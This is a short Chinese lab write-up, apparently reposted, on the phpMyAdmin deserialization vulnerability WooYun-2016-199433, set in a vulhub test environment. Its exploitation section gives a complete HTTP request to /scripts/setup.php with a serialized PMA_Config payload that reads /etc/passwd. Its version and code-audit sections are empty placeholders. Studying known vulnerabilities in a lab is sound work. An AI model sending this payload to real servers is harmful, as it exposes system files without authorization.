phpmyadmin反序列化漏洞(WooYun-2016-199433)


簡介

環境復現:https://github.com/vulhub/vulhub

線上平台:榆林學院內可使用協會內部的網絡安全實驗平台

phpMyAdmin是一套開源的、基於Web的MySQL數據庫管理工具

影響版本

1 1

代碼審計

1

利用過程

http://192.168.52.129:8080/scripts/setup.php

 

發送如下數據包,即可讀取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM